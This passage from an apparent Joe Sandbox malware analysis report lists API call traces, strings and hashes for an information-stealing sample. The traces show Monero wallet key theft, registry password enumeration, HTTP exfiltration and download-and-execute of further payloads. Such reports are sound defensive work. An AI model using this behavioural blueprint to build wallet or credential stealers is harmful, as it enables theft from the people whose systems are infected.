                                                              • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                              • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                              • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                              • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                              • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                                            • lstrlenA.KERNEL32(?), ref: 0040135C
                                                            • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00845370,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                              • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                              • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                              • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                              • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                              • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                            • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                                            • memset.MSVCRT ref: 00401516
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                            • API String ID: 1930502592-218353709
                                                            • Opcode ID: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                                            • Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
                                                            • Opcode Fuzzy Hash: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                                            • Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA
                                                            Function 004152C0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 138stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                              • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,0087AEB0), ref: 00406303
                                                              • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                              • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0087A830,00000000,00000000,00400100,00000000), ref: 00406385
                                                              • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                              • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                            • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                              • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                            • lstrlenA.KERNEL32(00000000), ref: 00415383
                                                            • strtok.MSVCRT(00000000,?), ref: 0041539E
                                                            • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                            • API String ID: 3532888709-1526165396
                                                            • Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                            • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                                            • Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                            • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                                            Function 004060A0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 133networkfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                              • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                              • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                            • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                                            • StrCmpCA.SHLWAPI(?,0087AEB0), ref: 00406147
                                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                                            • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                                            • InternetCloseHandle.WININET(a+A), ref: 00406253
                                                            • InternetCloseHandle.WININET(00000000), ref: 00406260
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                            • String ID: a+A$a+A
                                                            • API String ID: 4287319946-2847607090
                                                            • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                            • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                                            • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                            • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                                            Function 022E0CC7 Relevance: 18.2, APIs: 12, Instructions: 205stringprocesssynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            • memset.MSVCRT ref: 022E0E83
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E0E9C
                                                            • lstrcat.KERNEL32(?,00420D7C), ref: 022E0EAE
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E0EC4
                                                            • lstrcat.KERNEL32(?,00420D80), ref: 022E0ED6
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E0EEF
                                                            • lstrcat.KERNEL32(?,00420D84), ref: 022E0F01
                                                            • lstrlen.KERNEL32(?), ref: 022E0F0E
                                                            • memset.MSVCRT ref: 022E0F34
                                                            • memset.MSVCRT ref: 022E0F48
                                                              • Part of subcall function 022EAA87: lstrlen.KERNEL32(022D516C,?,?,022D516C,00420DDE), ref: 022EAA92
                                                              • Part of subcall function 022EAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022EAAEC
                                                              • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022E9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,022E0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 022E9948
                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 022E0FC1
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 022E0FCD
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                            • String ID:
                                                            • API String ID: 1395395982-0
                                                            • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                            • Instruction ID: bb69edd30aa5c02f11f638149630c00747a39274ea46de07c3087315323c12c5
                                                            • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                            • Instruction Fuzzy Hash: 738180B5920318ABCF14EBE0DD91FED733AAF54304F804199A30B66185EE746B88DF59
                                                            Function 022E0CB6 Relevance: 18.2, APIs: 12, Instructions: 185stringprocesssynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            • memset.MSVCRT ref: 022E0E83
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E0E9C
                                                            • lstrcat.KERNEL32(?,00420D7C), ref: 022E0EAE
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E0EC4
                                                            • lstrcat.KERNEL32(?,00420D80), ref: 022E0ED6
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E0EEF
                                                            • lstrcat.KERNEL32(?,00420D84), ref: 022E0F01
                                                            • lstrlen.KERNEL32(?), ref: 022E0F0E
                                                            • memset.MSVCRT ref: 022E0F34
                                                            • memset.MSVCRT ref: 022E0F48
                                                              • Part of subcall function 022EAA87: lstrlen.KERNEL32(022D516C,?,?,022D516C,00420DDE), ref: 022EAA92
                                                              • Part of subcall function 022EAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022EAAEC
                                                              • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022E9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,022E0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 022E9948
                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 022E0FC1
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 022E0FCD
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                            • String ID:
                                                            • API String ID: 1395395982-0
                                                            • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                            • Instruction ID: 0f719fcb54180e06364c7099f59309dc57ef029f76345db033b3b98ece3461f4
                                                            • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                            • Instruction Fuzzy Hash: B561AEB5520318ABCF14EBE0DD85FED733AAF54304F804199A70B66185EE742B88CF59
                                                            Function 022D4AE7 Relevance: 17.0, APIs: 11, Instructions: 479networkstringfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A51
                                                              • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A68
                                                              • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A7F
                                                              • Part of subcall function 022D4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022D4AA0
                                                              • Part of subcall function 022D4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022D4AB0
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 022D4B7C
                                                            • StrCmpCA.SHLWAPI(?,0064A480), ref: 022D4BA1
                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022D4D21
                                                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 022D504F
                                                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 022D506B
                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 022D507F
                                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 022D50B0
                                                            • InternetCloseHandle.WININET(00000000), ref: 022D5114
                                                            • InternetCloseHandle.WININET(00000000), ref: 022D512C
                                                            • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022D4D7C
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                            • InternetCloseHandle.WININET(00000000), ref: 022D5136
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                            • String ID:
                                                            • API String ID: 2402878923-0
                                                            • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                            • Instruction ID: 21a76691624c61f5b7b1424e415f815fb5e120f1ce242c80f8999c252b95355d
                                                            • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                            • Instruction Fuzzy Hash: 7B12A972920318AACF15EBD4DD91EEEB37ABF65300F904199A10762194EF742F88DF61
                                                            Function 022D64E7 Relevance: 16.7, APIs: 11, Instructions: 191networkfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A51
                                                              • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A68
                                                              • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A7F
                                                              • Part of subcall function 022D4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022D4AA0
                                                              • Part of subcall function 022D4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022D4AB0
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 022D6548
                                                            • StrCmpCA.SHLWAPI(?,0064A480), ref: 022D656A
                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022D659C
                                                            • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022D65EC
                                                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 022D6626
                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 022D6638
                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 022D6664
                                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 022D66D4
                                                            • InternetCloseHandle.WININET(00000000), ref: 022D6756
                                                            • InternetCloseHandle.WININET(00000000), ref: 022D6760
                                                            • InternetCloseHandle.WININET(00000000), ref: 022D676A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                            • String ID:
                                                            • API String ID: 3074848878-0
                                                            • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                            • Instruction ID: 010a79656eda3fd90a2a50c07f3ab8d02aca67028114a3aad40fe2fd1ca24a78
                                                            • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                            • Instruction Fuzzy Hash: 2A717E75A60318ABEF24DFE4DC48BEE7779FB44700F508199E10A6B294DBB46A84CF41
                                                            Function 022E9277 Relevance: 16.7, APIs: 11, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 022E92D3
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateGlobalStream
                                                            • String ID:
                                                            • API String ID: 2244384528-0
                                                            • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                            • Instruction ID: 67a4045ee0eb0c53bb6f177a654d3697e84ca9963e2100c7ff82298365760a06
                                                            • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                            • Instruction Fuzzy Hash: 6B71FAB9A50208ABDB14DFE4DD84FEEB7BAFF49300F508108F506A7294DB74A944CB61
                                                            Function 004170D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                                            • memset.MSVCRT ref: 0041716A
                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                                            Strings
                                                            • sA, xrefs: 004172AE, 00417179, 0041717C
                                                            • sA, xrefs: 00417111
                                                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: OpenProcesslstrcpymemset
                                                            • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                            • API String ID: 224852652-2614523144
                                                            • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                            • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                                            • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                            • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                                            Function 022E7767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 022E77A9
                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 022E77E6
                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E786A
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022E7871
                                                            • wsprintfA.USER32 ref: 022E78A7
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                            • String ID: :$C$\$B
                                                            • API String ID: 1544550907-183544611
                                                            • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                            • Instruction ID: b090b413dba251d6d830d90180377f1f9ec6c1da5914251afc695a9631a2d21e
                                                            • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                            • Instruction Fuzzy Hash: 6A418EB1D10258ABDF10DFD4CC45BEEBBB9EF58700F400199E506A7280D7756A84DBA6
                                                            Function 004075D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                                              • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                              • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                              • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                              • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                              • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
